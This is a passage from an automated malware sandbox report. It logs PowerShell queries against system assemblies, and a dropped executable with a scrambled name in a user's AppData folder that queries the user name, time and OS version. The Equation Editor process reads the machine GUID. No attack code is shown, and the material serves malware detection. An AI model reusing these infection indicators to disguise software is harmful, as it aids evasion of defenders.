Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query local / system time

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001E71D1 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

18_2_001E71D1

Contains functionality to query the account / user name

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001E4380 GetUserNameW,

18_2_001E4380

Contains functionality to query windows version

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

18_2_001EEDA0

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Cryptography:

Spam, unwanted Advertisements and Ransom Demands:

Exploits:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Software Vulnerabilities:

Networking:

Remote Access Functionality:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph